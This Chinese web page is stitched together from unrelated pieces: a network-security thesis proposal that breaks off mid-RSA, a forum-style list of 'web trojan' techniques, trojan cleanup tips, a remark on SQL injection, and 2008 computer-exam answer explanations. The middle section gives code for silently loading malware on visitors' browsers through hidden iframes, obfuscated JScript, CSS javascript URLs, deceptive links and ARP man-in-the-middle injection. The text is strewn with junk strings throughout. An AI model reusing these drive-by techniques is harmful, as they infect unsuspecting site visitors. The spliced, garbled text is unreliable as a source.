dsm 服务器_dss服务器攻击

计算机网络安全漏洞及防范开题报告

1. 背景和意义

随着计算机的发展,人们越来越意识到网络的重要性,通过网络,分散在各处的计算机被网络联系在一起。做为网络的组成部分,把众多的计算机联系在一起,组成一个局域网,在这个局域网中,可以在它们之间共享程序、文档等各种资源；还可以通过网络使多台计算机共享同一硬件,如打印机、调制解调器等；同时我们也可以通过网络使用计算机发送和接收传真,方便快捷而且经济。

21世纪全世界的计算机都将通过Internet联到一起,信息安全的内涵也就发生了根本的变化。它不仅从一般性的防卫变成了一种非常普通的防范,而且还从一种专门的领域变成了无处不在。当人类步入21世纪这一信息社会、网络社会的时候,我国将建立起一套完整的网络安全体系,特别是从政策上和法律上建立起有中国自己特色的网络安全体系。

一个国家的信息安全体系实际上包括国家的法规和政策,以及技术与市场的发展平台。我国在构建信息防卫系统时,应着力发展自己独特的安全产品,我国要想真正解决网络安全问题,最终的办法就是通过发展民族的安全产业,带动我国网络安全技术的整体提高。

网络安全产品有以下几大特点：第一,网络安全来源于安全策略与技术的多样化,如果采用一种统一的技术和策略也就不安全了；第二,网络的安全机制与技术要不断地变化；第三,随着网络在社会个方面的延伸,进入网络的手段也越来越多,因此,网络安全技术是一个十分复杂的系统工程。为此建立有中国特色的网络安全体系,需要国家政策和法规的支持及集团联合研究开发。安全与反安全就像矛盾的两个方面,总是不断地向上攀升,所以安全产业将来也是一个随着新技术发展而不断发展的产业。

信息安全是国家发展所面临的一个重要问题。对于这个问题,我们还没有从系统的规划上去考虑它,从技术上、产业上、政策上来发展它。政府不仅应该看见信息安全的发展是我国高科技产业的一部分,而且应该看到,发展安全产业的政策是信息安全保障系统的一个重要组成部分,甚至应该看到它对我国未来电子化、信息化的发展将起到非常重要的作用。第二章网络安全现状

2.网络安全面临的挑战

网络安全可能面临的挑战

垃圾邮件数量将变本加厉。

根据电子邮件安全服务提供商Message Labs公司最近的一份报告,预计2003年全球垃圾邮件数量的增长率将超过正常电子邮件的增长率,而且就每封垃圾邮件的平均容量来说,也将比正常的电子邮件要大得多。这无疑将会加大成功狙击垃圾邮件的工作量和难度。目前还没有安装任何反垃圾邮件软件的企业公司恐怕得早做未雨绸缪的工作,否则就得让自己的员工们在今后每天不停地在键盘上按动“删除键”了。另外,反垃圾邮件软件也得不停升级,因为目前垃圾邮件传播者已经在实行“打一枪换一个地方”的游击战术了。

即时通讯工具照样难逃垃圾信息之劫。

即时通讯工具以前是不大受垃圾信息所干扰的,但现在情况已经发生了很大的变化。垃圾邮件传播者会通过种种手段清理搜集到大量的网络地址,然后再给正处于即时通讯状态的用户们发去信息,诱导他们去访问一些非法收费网站。更令人头疼的是,目前一些推销合法产品的厂家也在使用这种让人厌烦的手段来让网民们上钩。目前市面上还没有任何一种反即时通讯干扰信息的软件,这对软件公司来说无疑也是一个商机。

内置防护软件型硬件左右为难。

现在人们对网络安全问题受重视的程度也比以前大为提高。这种意识提高的表现之一就是许多硬件设备在出厂前就内置了防护型的软件。这种做法虽然前几年就已经出现,预计在今后的几年中将会成为一种潮流。但这种具有自护功能的硬件产品却正遭遇着一种尴尬,即在有人欢迎这种产品的同时,也有人反对这样的产品。往好处讲,这种硬件产品更容易安装,整体价格也相对低廉一些。但它也有自身的弊端：如果企业用户需要更为专业化的软件服务时,这种产品就不会有很大的弹性区间。

企业用户网络安全维护范围的重新界定。

目前各大企业公司的员工们在家里通过宽带接入而登录自己公司的网络系统已经是一件很寻常的事情了。这种工作新方式的出现同样也为网络安全带来了新问题,即企业用户网络安全维护范围需要重新界定。因为他们都是远程登录者,并没有纳入传统的企业网络安全维护的“势力范围”之内。另外,由于来自网络的攻击越来越严重,许多企业用户不得不将自己网络系统内的每一台PC机都装上防火墙、反侵入系统以及反病毒软件等一系列的网络安全软件。这同样也改变了以往企业用户网络安全维护范围的概念。

个人的信用资料。

个人信用资料在公众的日常生活中占据着重要的地位。以前的网络犯罪者只是通过网络窃取个人用户的信用卡账号,但随着网上窃取个人信用资料的手段的提高,预计2003年这种犯罪现象将会发展到全面窃取美国公众的个人信用资料的程度。如网络犯罪者可以对你的银行存款账号、社会保险账号以及你最近的行踪都能做到一览无余。如果不能有效地遏制这种犯罪趋势,无疑将会给美国公众的日常人生活带来极大的负面影响。

3.病毒现状

互联网的日渐普及使得我们的日常生活不断网络化,但与此同时网络病毒也在继续肆虐威胁泛滥。在过去的六个月内,互联网安全饱受威胁,黑客蠕虫入侵问题越来越严重,已成泛滥成灾的趋势。

2003年8月,冲击波蠕虫在视窗暴露安全漏洞短短26天之后喷涌而出,8天内导致全球电脑用户损失高达20亿美元之多,无论是企业系统或家庭电脑用户无一幸免。

据最新出炉的赛门铁克互联网安全威胁报告书(Symantec Internet Security Threat Report)显示,在2003年上半年,有超过994种新的Win32病毒和蠕虫被发现,这比2002年同时期的445种多出一倍有余。而目前Win32病毒的总数大约是4千个。在2001年的同期,只有308种新Win32病毒被发现。

这份报告是赛门铁克在今年1月1日至6月31日之间,针对全球性的网络安全现状,提出的最为完整全面的威胁趋势分析。受访者来自世界各地500名安全保护管理服务用户,以及2万个DeepSight威胁管理系统侦察器所探测的数据。

赛门铁克高级区域董事罗尔威尔申在记者通气会上表示,微软虽然拥有庞大的用户市占率,但是它的漏洞也非常的多,成为病毒目标是意料中事。

他指出,开放源码如Linux等之所以没有受到太多病毒蠕虫的袭击,完全是因为使用者太少,以致于病毒制造者根本没有把它不放在眼里。他举例说,劫匪当然知道要把目标锁定在拥有大量现金的银行,所以他相信随着使用Linux平台的用户数量的增加,慢慢地将会有针对Linux的病毒和蠕虫出现。

不过,他不同意开放源码社群的合作精神将能有效地对抗任何威胁的袭击。他说,只要是将源码暴露在外,就有可能找出其安全漏洞,而且世上不是全是好人,不怀好意的人多的是。

即时通讯病毒4倍增长

赛门铁克互联网安全威胁报告书指出,在2003年上半年使用诸如ICQ之类即时通讯软件(Instant Messaging,IM)和对等联网(P2P)来传播的病毒和蠕虫比2002年增加了400%,在50大病毒和蠕虫排行榜中,使用IM和P2P来传播的恶意代码共有19个。据了解,IM和P2P是网络安全保护措施不足导致但这并不是主因,主因在于它们的流行广度和使用者的无知。

该报告显示,该公司在今年上半年发现了1千432个安全漏洞,比去年同时期的1千276个安全漏洞,增加了12%。其中80%是可以被人遥控的,因此严重型的袭击可以通过网络来进行,所以赛门铁克将这类可遥控的漏洞列为中度至高度的严重危险。另外,今年上半年的新中度严重漏洞增加了21%、高度严重漏洞则增加了6%,但是低度严重漏洞则减少了11%。

至于整数错误的漏洞也有增加的趋势,今年的19例比起去年同期的3例,增加了16例。微软的互联网浏览器漏洞在今年上半年也有12个,而微软的互联网资讯服务器的漏洞也是非常的多,赛门铁克相信它将是更多袭击的目标；以前袭击它的有尼姆达(Nimda)和红色代码(Code Red)。

该报告显示了64%的袭击是针对软件新的安全漏洞(少过1年的发现期),显示了病毒制造者对漏洞的反应越来越快了。以Blaster冲击波为例,就是在Windows安全漏洞被发现短短26天后出现的。

知名病毒和蠕虫的威胁速度和频率也增加了不少,今年上半年的知名威胁比去年同期增加了20%,有60%的恶意代码(Malicious Code)是知名病毒。今年1月在短短数小时内造成全球性的瘫痪的Slammer蠕虫,正是针对2002年7月所发现的安全漏洞。另外,针对机密信息的袭击也比去年上半年增加了50%,Bugbear.B就是一个专锁定银行的蠕虫。

黑客病毒特征

赛门铁克互联网安全威胁报告书中也显现了有趣的数据,比如周末的袭击有比较少的趋向,这与去年同期的情况一样。

虽然如此,周末两天加上来也有大约20%,这可能是袭击者会认为周末没人上班,会比较疏于防备而有机可乘。赛门铁克表示这意味着网络安全保护监视并不能因为周末休息而有所放松。

该报告书也比较了蠕虫类和非蠕虫类袭击在周末的不同趋势,非蠕虫类袭击在周末会有下降的趋势,而蠕虫类袭击还是保持平时的水平。蠕虫虽然不管那是星期几,但是有很多因素也能影响它传播的率,比如周末少人开机,确对蠕虫的传播带来一些影响。

该报告书也得出了在互联网中病毒袭击发生的高峰时间,是格林威治时间下午1点至晚上10点之间。虽然如此,各国之间的时差关系,各国遭到袭击的高峰时间也会有少许不同。比如说,华盛顿袭击高峰时间是早上8时和下午5时,而日本则是早上10时和晚上7时。

知名病毒和蠕虫的威胁速度和频率也增加了不少,今年上半年的知名威胁比去年同期增加了20%,有60%的恶意代码(Malicious Code)是知名病毒。今年1月在短短数小时内造成全球性的瘫痪的Slammer蠕虫,正是针对2002年7月所发现的安全漏洞。另外,针对机密信息的袭击也比去年上半年增加了50%,Bugbear.B就是一个专锁定银行的蠕虫。管理漏洞---如两台服务器同一用户/密码,则入侵了A服务器,B服务器也不能幸免；软件漏洞---如Sun系统上常用的Netscape EnterPrise Server服务,只需输入一个路径,就可以看到Web目录下的所有文件清单；又如很多程序只要接受到一些异常或者超长的数据和参数,就会导致缓冲区溢出；结构漏洞---比如在某个重要网段由于交换机、集线器设置不合理,造成黑客可以监听网络通信流的数据；又如防火墙等安全产品部署不合理,有关安全机制不能发挥作用,麻痹技术管理人员而酿成黑客入侵事故；信任漏洞---比如本系统过分信任某个外来合作伙伴的机器,一旦这台合作伙伴的机器被黑客入侵,则本系统的安全受严重威胁；

综上所述,一个黑客要成功入侵系统,必须分析各种和这个目标系统相关的技术因素、管理因素和人员因素。

因此得出以下结论：

a、世界上没有绝对安全的系统；b、网络上的威胁和攻击都是人为的,系统防守和攻击的较量无非是人的较量；c、特定的系统具备一定安全条件,在特定环境下,在特定人员的维护下是易守难攻的；d、网络系统内部软硬件是随着应用的需要不断发展变化的；网络系统外部的威胁、新的攻击模式层出不穷,新的漏洞不断出现,攻击手段的花样翻新,网络系统的外部安全条件也是随着时间的推移而不断动态变化的。

一言以蔽之,网络安全是相对的,是相对人而言的,是相对系统和应用而言的,是相对时间而言的。 4,安全防御体系

3.1.2

现代信息系统都是以网络支撑,相互联接,要使信息系统免受黑客、病毒的攻击,关键要建立起安全防御体系,从信息的保密性（保证信息不泄漏给未经授权的人）,拓展到信息的完整性（防止信息被未经授权的篡改,保证真实的信息从真实的信源无失真地到达真实的信宿）、信息的可用性（保证信息及信息系统确实为授权使用者所用,防止由于计算机病毒或其它人为因素造成的系统拒绝服务,或为敌手可用）、信息的可控性（对信息及信息系统实施安全监控管理）、信息的不可否认性（保证信息行为人不能否认自己的行为）等。

安全防御体系是一个系统工程,它包括技术、管理和立法等诸多方面。为了方便,我们把它简化为用三维框架表示的结构。其构成要素是安全特性、系统单元及开放互连参考模型结构层次。

安全特性维描述了计算机信息系统的安全服务和安全机制,包括身份鉴别、访问控制、数据保密、数据完整、防止否认、审计管理、可用性和可靠性。采取不同的安全政策或处于不同安全保护等级的计算机信息系统可有不同的安全特性要求。系统单元维包括计算机信息系统各组成部分,还包括使用和管理信息系统的物理和行政环境。开放系统互连参考模型结构层次维描述了等级计算机信息系统的层次结构。

该框架是一个立体空间,突破了以往单一功能考虑问题的旧模式,是站在顶层从整体上进行规划的。它把与安全相关的物理、规章及人员等安全要素都容纳其中,涉及系统保安和人员的行政管理等方面的各种法令、法规、条例和制度等均在其考虑之列。

另外,从信息战出发,消极的防御是不够的,应是攻防并重,在防护基础上检测漏洞、应急反应和迅速恢复生成是十分必要的。

目前,世界各国都在抓紧加强信息安全防御体系。美国在2000年1月到2003年5月实行《信息系统保护国家计划V1.0》,从根本上提高防止信息系统入侵和破坏能力。我国急切需要强化信息安全保障体系,确立我军的信息安全战略和防御体系。这既是时代的需要,也是国家安全战略和军队发展的需要,更是现实斗争的需要,是摆在人们面前刻不容缓的历史任务。 5加密技术

密码理论与技术主要包括两部分,即基于数学的密码理论与技术（包括公钥密码、分组密码、序列密码、认证码、数字签名、Hash函数、身份识别、密钥管理、PKI技术等）和非数学的密码理论与技术（包括信息隐形,量子密码,基于生物特征的识别理论与技术）。

自从1976年公钥密码的思想提出以来,国际上已经提出了许多种公钥密码体制,但比较流行的主要有两类：一类是基于大整数因子分解问题的,其中最典型的代表是RSA；另一类是基于离散对数问题的,比如ElGamal公钥密码和影响比较大的椭圆曲线公钥密码。由于分解大整数的能力日益增强,所以对RSA的安全带来了一定的威胁。目前768比特模长的RSA已不安全。一般建议使用1024比特模长,预计要保证20年的安全就要选择1280比特的模长,增大模长带来了实现上的难度。而基于离散对数问题的公钥密码在目前技术下512比特模长就能够保证其安全性。特别是椭圆曲线上的离散对数的计算要比有限域上的离散对数的计算更困难,目前技术下只需要160比特模长即可,适合于智能卡的实现,因而受到国内外学者的广泛关注。国际上制定了椭圆曲线公钥密码标准IEEEP1363,RSA等一些公司声称他们已开发出了符合该标准的椭圆曲线公钥密码。我国学者也提出了一些公钥密码,另外在公钥密码的快速实现方面也做了一定的工作,比如在RSA的快速实现和椭圆曲线公钥密码的快速实现方面都有所突破。公钥密码的快速实现是当前公钥密码研究中的一个热点,包括算法优化和程序优化。另一个人们所关注的问题是椭圆曲线公钥密码的安全性论证问题。

公钥密码主要用于数字签名和密钥分配。当然,数字签名和密钥分配都有自己的研究体系,形成了各自的理论框架。目前数字签名的研究内容非常丰富,包括普通签名和特殊签名。特殊签名有盲签名,代理签名,群签名,不可否认签名,公平盲签名,门限签名,具有消息恢复功能的签名等,它与具体应用环境密切相关。显然,数字签名的应用涉及到法律问题,美国联邦政府基于有限域上的离散对数问题制定了自己的数字签名标准（DSS）,部分州已制定了数字签名法。法国是第一个制定数字签名法的国家,其他国家也正在实施之中。在密钥管理方面,国际上都有一些大的举动,比如1993年美国提出的密钥托管理论和技术、国际标准化组织制定的X.509标准（已经发展到第3版本）以及麻省里工学院开发的Kerboros协议(已经发展到第5版本)等,这些工作影响很大。密钥管理中还有一种很重要的技术就是秘密共享技术,它是一种分割秘密的技术,目的是阻止秘密过于集中,自从1979年Shamir提出这种思想以来,秘密共享理论和技术达到了空前的发展和应用,特别是其应用至今人们仍十分关注。我国学者在这些方面也做了一些跟踪研究,发表了很多论文,按照X.509标准实现了一些CA。但没有听说过哪个部门有制定数字签名法的意向。目前人们关注的是数字签名和密钥分配的具体应用以及潜信道的深入研究。

认证码是一个理论性比较强的研究课题,自80年代后期以来,在其构造和界的估计等方面已经取得了长足的发展,我国学者在这方面的研究工作也非常出色,影响较大。目前这方面的理论相对比较成熟,很难有所突破。另外,认证码的应用非常有限,几乎停留在理论研究上,已不再是密码学中的研究热点。

Hash函数主要用于完整性校验和提高数字签名的有效性,目前已经提出了很多方案,各有千秋。美国已经制定了Hash标准-SHA-1,与其数字签名标准匹配使用。由于技术的原因,美国目前正准备更新其Hash标准,另外,欧洲也正在制定Hash标准,这必然导致Hash函数的研究特别是实用技术的研究将成为热点。

信息交换加密技术分为两类：即对称加密和非对称加密。

1.对称加密技术

在对称加密技术中,对信息的加密和解密都使用相同的钥,也就是说一把钥匙开一把锁。这种加密方法可简化加密处理过程,信息交换双方都不必彼此研究和交换专用的加密算法。如果在交换阶段私有密钥未曾泄露,那么机密性和报文完整性就可以得以保证。对称加密技术也存在一些不足,如果交换一方有N个交换对象,那么他就要维护N个私有密钥,对称加密存在的另一个问题是双方共享一把私有密钥,交换双方的任何信息都是通过这把密钥加密后传送给对方的。如三重DES是DES（数据加密标准）的一种变形,这种方法使用两个独立的56为密钥对信息进行3次加密,从而使有效密钥长度达到112位。

2.非对称加密/公开密钥加密

在非对称加密体系中,密钥被分解为一对（即公开密钥和私有密钥）。这对密钥中任何一把都可以作为公开密钥（加密密钥）通过非保密方式向他人公开,而另一把作为私有密钥（解密密钥）加以保存。公开密钥用于加密,私有密钥用于解密,私有密钥只能有生成密钥的交换方掌握,公开密钥可广泛公布,但它只对应于生成密钥的交换方。非对称加密方式可以使通信双方无须事先交换密钥就可以建立安全通信,广泛应用于身份认证、数字签名等信息交换领域。非对称加密体系一般是建立在某些已知的数学难题之上,是计算机复杂性理论发展的必然结果。最具有代表性是RSA公钥密码体制。

3.RSA算法

RSA算法是Rivest、Shamir和Adleman于1977年提出的第一个完善的公钥密码体制,其安全性是基于分解大整数的困难性。在RSA体制中使用了这样一个基本事实：到目前为止,无法找到一个有效的算法来分解两大素数之积。RSA算法的描述如下：

公开密钥：n=pq(p、q分别为两个互异的大素数,p、q必须保密)

在网页是让访问网页的人自动下载并且自动安装的代码

一:框架挂马浪漫之家社区门户.}8d{ocb

;Z}x?\` sT-e0 iframe src=地址 width=0 height=0/iframe浪漫之家社区门户*f2iNFvtV$V

]-iXpQG+v$\0二:js文件挂马浪漫之家社区门户2D(D_3QU1a YS

T,UEsy(~ Q!i"K0 首先将以下代码浪漫之家社区门户XvKDSs_ n

document.write("iframe width='0' height='0' src='地址'/iframe");浪漫之家社区门户7v1rWpv4E`

保存为xxx.js，

0];Q.E?N A0 则JS挂马代码为

xt].y4QfX0 script language=javascript src=xxx.js/script

(~+}Cy:R9ss0浪漫之家社区门户(rJ(E^5Z b|+p

三:js变形加密浪漫之家社区门户w4{7v~ Cj

浪漫之家社区门户gAub7\5Us

SCRIPT language="JScript.Encode" src=;/script浪漫之家社区门户'IQWSv

muma.txt可改成任意后缀浪漫之家社区门户 aJ5~7sX]

四:body挂马浪漫之家社区门户LV3X"HVc?#[

7y0k9P;Zhn0 body /body

0u yo.{\Za0浪漫之家社区门户;M2cA Xo,[\,m

五:隐蔽挂马

P2@vj2\m}.LBf0浪漫之家社区门户bF9^c A;i[6\;l k`

top.document.body.innerHTML = top.document.body.innerHTML + '\r\niframe src=""/iframe';浪漫之家社区门户o1}"uC)u

浪漫之家社区门户'_g+N#` x'@$x

六:css中挂马浪漫之家社区门户^1c9|5T+E3A l `0R

.P:ZGz3qy`0 body {浪漫之家社区门户*]N5b+S2d!k v!p%o

background-image: url('javascript:document.write("script src=;/script")')}浪漫之家社区门户9@ T{-jBQk:c*k i

8@mpE3Y-E+[o0七:JAJA挂马

^O7hzN0

El*V z{4Wz3lGs,?,D0 SCRIPT language=javascript

LX@2t B5j4xRL.~0 window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 浪漫之家社区门户RoN {z]J{A$}b[

/script浪漫之家社区门户L0} N.Ii2x`P*GT+@

浪漫之家社区门户 A0h2l%|ekT

八:图片伪装

1x(lu.\1NE'p:sY0浪漫之家社区门户TfZ4L:VR_ U

html浪漫之家社区门户b8X%K"AZ?;WAZ$y

iframe src="网马地址" height=0 width=0/iframe

g^M2c8Iqj/S0g0 img src="图片地址"/center浪漫之家社区门户#D5H!L Au cgU

/html浪漫之家社区门户I8@J(j$hfI b

4p'kxc!jyhLtL0九:伪装调用：浪漫之家社区门户3n [?5j8HlA|

浪漫之家社区门户Pno.ND

frameset rows="444,0" cols="*"浪漫之家社区门户2|6jm6W+C*h

frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"

Jg({%E!v,~1v VN0 frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"

E!|n#AQ'H/J F0 /frameset浪漫之家社区门户*r;B?D"wLE-zI n

浪漫之家社区门户4OCpi/W6gNM%rU

十:高级欺骗

`8A${,qi0

j w3dMu'}9Z0 a href="(迷惑连接地址，显示这个地址指向木马地址)" 页面要显示的内容 /a

_`!xA,B3e zt6T;C0SCRIPT Language="JavaScript"浪漫之家社区门户L%w~StQ-@5]S

function www_163_com ()浪漫之家社区门户O U7\%d Z7x

{浪漫之家社区门户%l4y"C)Rj-Re1g

var url="网马地址";

[};t0AG0open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");浪漫之家社区门户 Wh!j+Hm;`c

}浪漫之家社区门户)r5g#Sj7SB4^_

/SCRIPT

:yN~-a!^$?dd6E0浪漫之家社区门户u~E6KQD

十一: 超级网马—通过arp欺骗来直接挂马

:mhZ2F3r3r-z$s2O0

"YO8C^i$rl/].o0原理：arp中间人攻击，实际上相当于做了一次代理。浪漫之家社区门户]%DpqmFV?C8E7_F

浪漫之家社区门户:|3_j$@aw.]?t

正常时候: A----B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机

7LI KTs0arp中间人攻击时候: A----C----B

gh|$[b N0B----C----A

iIqcO8v0实际上,C在这里做了一次代理的作用浪漫之家社区门户9lxbjEE9_3Xr r L

浪漫之家社区门户R.{*kT9Ui

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如iframe...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

8cd1bA j+v}0

p6j4xgv0如何处理网页木马：

.r:ej y}izC#i01、找到嵌入的网页木马文件。以下，拿自己的经历说事。找到的文件是wm.htm

#c [:[}.caA ?4s)ax0浪漫之家社区门户C%qQ7Xd M-i8T,\ q

2、在注册表中查找wm.htm。很幸运，找到了。开始顺藤摸瓜...浪漫之家社区门户)qJXkHY)I

浪漫之家社区门户*@ L uIi

3、修改键值wm.htm为wm_nnd.htm。

/bX0e5I-`0浪漫之家社区门户R+jyC)wk8Kl,y

4、再次查找wm.htm。很不幸，又查到了。说明有服务程序在作怪。嘿嘿，有意外发现。浪漫之家社区门户bQ[7~,\2P

cain.exe，据说是密码嗅探器。浪漫之家社区门户gG.px xa_C

8m9e"z5^!q)[8By8iY;BA05、修改键值cain.exe为cain_nnd.exe。

`m+b3@ @-H0浪漫之家社区门户ax;U+p1n(J

6、查找cain.exe，仍然可以查到。嘻嘻，在预料之中。

M*UQ:\7Rc`B0浪漫之家社区门户U(F0Nu9W

7、怀疑wm.htm与cain.exe同流合污，背后有服务程序作后台。浪漫之家社区门户}zj4x V2G

浪漫之家社区门户V;q0l:@Sri

8、快查查看，系统服务程序。在运行-msconfig 或直接在命令行使用net start，查看可疑程序

vI4f J)L o)D0

'i G*E W*^a09、发现temp*.exe（全名记不清了），立马net stop server 。浪漫之家社区门户;F{%\B7r a9eY

'W2IH9bP2MI:Oxkk010、快去修改键值wm.htm为wm_nnd.htm，cain.exe为cain_nnd.exe。

0jW r7O C0

(j}y,w6G+Z011、再次查找wm.htm或cain.exe,没有找到。哈哈，很好。

Q(|%h,}t0

5VO\mW@;y.N;n012、观察了几天，没再发生挂马的现象。 另外，通过检测网络连接查看服务器是否中了木马或病毒浪漫之家社区门户3\O] @n{r

浪漫之家社区门户I$@K9QNS${/U

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

.gB1n dL(|H}0

(B.Qv1v%?2k+G X02、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息，可以完全监控计算机上的连接，从而达到控制计算机的目的。

7J;rK5WE0浪漫之家社区门户"i \$J\ KI

3、手工制作bat程序，生成网络连接日志文件供站长分析：bat文件代码如下

1BKY-~#Bx8u@J#G0浪漫之家社区门户2@wQY5M

REM 注释：监控的时间

;|)RUz!A;X@0time /tNetstat.log浪漫之家社区门户L:vR9ZSum

REM 每隔30秒，把服务器上通过tcp协议通讯的IP和端口写入日志文件浪漫之家社区门户8| F {.f,p*H5f a]

Netstat -n -p tcp 30Netstat.log浪漫之家社区门户9LUgLM(X[%v

dA_"C_`!J+{0注意：要谨慎使用，这会给服务器带来性能影响。最好，在服务器发生异常，怀疑中木马或病毒时，用来分析网络连接日志。浪漫之家社区门户y Bs}mZ\

浪漫之家社区门户ef$J!@#k

仅仅这些还不够，说说更严重的：浪漫之家社区门户 nw!C~/@.k {bc_

6UM T%`3HQs8`m r01、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户，但这个账户是不经常用的， 然后使用工具把这个账户提升到管理员权限，从表面上看来这个账户还是和原来一样，但是这个克隆的账户却是系统中最大的安全隐患。浪漫之家社区门户i{${1}v1hd+r$E"ix

浪漫之家社区门户 j8o0~|`:~^"BG

2、赶快检测系统帐户：

X!u'w Q7^*cJ(oOH0a、在命令行下输入net user，查看计算机上有些什么用户。浪漫之家社区门户] t G.^ @T

b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。

9b)~~x0?"l,Gru0c、一般除了Administrator是administrators组的，如果你发现一个系统内置的用户是属于administrators组的，

E T/u/d%i#B1{u0 那么别人在你的计算机上克隆账户的概率为90%。浪漫之家社区门户*w}+g9B0\

d、是使用“net user 用户名 /del” 来删掉这个用户，还是修改其它配置，这你说了算。

sql注入发生在计算机网络的哪一层

应用层，每一层，这都有一定道理。

但其实SQL注入发生在服务器的业务逻辑层，和计算机网络就没有关系啊，你还需要学习一个。

你JS防，网络层防什么用没有，你只能在业务逻辑层防。

四川省计算机三级真题答案

下面是2008年4月计算机等级考试三级网络技术的试题答案详细的解析。此稿由金版电子出版社、新思路教育科技研究中心提供，转载请注明来源！

一、选择题

1.解析：2008年北京奥运会全球合作伙伴有：可口可乐、源讯、通用电气、柯达、联想、宏利、麦当劳、欧米茄、松下、三星、威士，其中联想、三星、松下是IT企业，微软不是2008年北京奥运会赞助商。答案选A。

2.解析：1的ASCII码为00110001，2的ASCII码为00110010，所以0的ASCII为00110000，8的ASCII码为00111000，2008的ASCII值为：00110010 00110000 00110000 00111000。答案选D。

3. 解析：主板的分类方法很多，下面是常用的分类方法，如表1所示。

表1 主板分类

分类项

分类内容

CPU芯片

486主板、奔腾主板、AMD主板等

CPU插座

Socket7主板、Slot1主板等

主板规格

AT主板、Baby—AT主板、ATX主板等

存储容量

16M主板、32M主板、64M主板等

芯片集

TX主板、LX主板、BX主板等

即插即用

PnP主板、非PnP主板等

系统总线的宽度

66MHz主板、100MHz主板等

数据端口

SCSI主板、EDO主板、AGP主板等

扩展槽

EISA主板、PCI主板、USB主板等

生产厂家

联想主板、华硕主板、海洋主板等

由表可知选项A是正确的。选项B中SCSI主板、EDO主板是按照数据端口来划分的，C选项中AT主板、ATX主板是按照主板规格来分的，D选项中Slot主板、Socket主板是按CPU插座来分的。答案选A。

4．解析：本题考察奔腾芯片的技术特点，奔腾芯片的特点有：（1）超标量技术，内置多条流水线能同时执行多个处理，实质是以空间换取时间，奔腾由两条整数指令流水线和一条浮点指令流水线组成；（2）超流水线技术，细化了流水并提高主频，实质是以时间换取空间；（3）双Cache的哈佛结构，指令与数据分开存储的结构称为哈佛结构，对于保持流水线的持续流动有重要意义；（4）分支预测，为了保持流水线的较高吞吐率，奔腾芯片内置了分支目标缓存器。目前处理器芯片已经由单核发展到多核，处理性能更加优越。答案选B。

5. 解析：由于声音和图像等信息，其数字化后的数据量十分庞大，必须对数据进行压缩才能满足使用的要求；JPEG标准定义了连续色调、多级灰度、彩色或单色静止图像等国际标准；MPEG标准包括视频、音频和系统3部分，它要考虑到音频和视频的同步，联合压缩后产生一个电视质量的视频和音频压缩形式的位速率为1.5Mbps的单一流。答案选A。

6. 解析：文档是软件开发、使用维护中必备的资料。它能提高软件开发的效率、保证软件的质量，而且在软件的使用过程中有指导、帮助、解惑的作用，尤其在维护工作中，文档是不可或缺的资料。软件的生命周期包括计划、开发和运行三个阶段，在开发初期分为需求分析、总体设计和详细设计三个子阶段，在开发后期分为编码和测试两个子阶段。A、B、C选项说法都正确，答案选D。

7. 解析：路由器在因特网中起到重要的作用，它连接两个或者多个物理网络，负责将重一个网络接收来的IP数据报，经过路由选择，转发到一个合适的网络中。答案选C。

8. 解析：数据传输速率在数值上等于每秒钟传输构成数据代码的二进制比特数，单位比特/秒，记做b/s或bps。对于二进制数据，数据传输速率为S=1/T，T为传送每一比特所需要的时间。传送10bit数据时，所用的时间为： ，答案选B。

9.解析：一个网络协议由语法、语义和时序三个要素组成，语法 用户数据与控制信息的结构和格式；语义是指需要发出何种控制信息以及完成的动作与作出的响应；时序即对事件实现顺序的详细说明。答案选A。

10.解析：OSI参考模型的分层原则是：（1）网中各结点都有相同的层次；（2）不同结点的同等层具有相同的功能；（3）每一层内相邻层之间通过接口通信；（4）不同结点的同等层按照协议实现对等层之间的通信。由（4）可知D选项说法错误，答案选D。

11.解析：OSI参考模型和TCP/IP参考模型共同之处都采用了层次结构的概念，在传输层中两者定义了相似的功能，但两者在层次划分、使用的协议上有很大的区别，如表2所示。

表2 OSI参考模型与TCP/IP参考模型的比较

OSI参考模型

TCP/IP参考模型

应用层

应用层

表示层

会话层

传输层

传输层

网络层

互连层

数据链路层

主机-网络层

由表可知，TCP/IP参考模型的主机-网络层对应OSI参考模型的是数据链路层和物理层，答案选D。

12.解析：传输层的主要功能是负责应用进程之间的端—端通信，TCP/IP参考模型中设计传输层的主要目的是在互联网中源主机与目的主机的对等实体之间建立用于会话的端—端连接，从这一点看TCP/IP参考模型和OSI参考模型的传输层中是相似的，答案选B。

13.解析：主机名到IP地址的映射是借助于一组即独立又协作的域名服务器完成的，因特网中域名结构由TCP/IP协议集的域名系统（DNS，Domain Name System）进行定义。答案选B。

14.解析：分辨率为640×480的真彩色图像（像素分辨率为24b），其数据量为7.37Mb（640×480×24），一秒25帧的速率的话占用的带宽为：640×480×24×25 = 184320000bps = 184.32Mbps，答案选C。

15.解析：ISO将整个通信功能划分为七个层次，各层的功能如表3所示。

表3 OSI参考模型结构

名称

功能作用

物理层

OSI的最底层，利用物理传输介质为数据链路层提供物理连接，以便透明地传输比特流

数据链路层

在通信实体之间建立数据链路连接，传送以帧为单位的数据，采用差错控制、流量控制方法，使有差错的物理线路变成无差错的数据链路

网络层

通过路由算法，为分组通过通信子网选择最适当的路径

传输层

向用户提供可靠的端到端服务，透明地传送报文。向高层屏蔽了下层数据通信的细节，是计算机通信体系结构中最为关键的一层

会话层

组织两个会话进程之间的通信，并管理数据的交换

表示层

处理两个通信系统中交换信息的表示方式

应用层

OSI参考模型的最高层。确立进程之间的通信的性质，以满足用户的需要

由表中可知，答案选C。

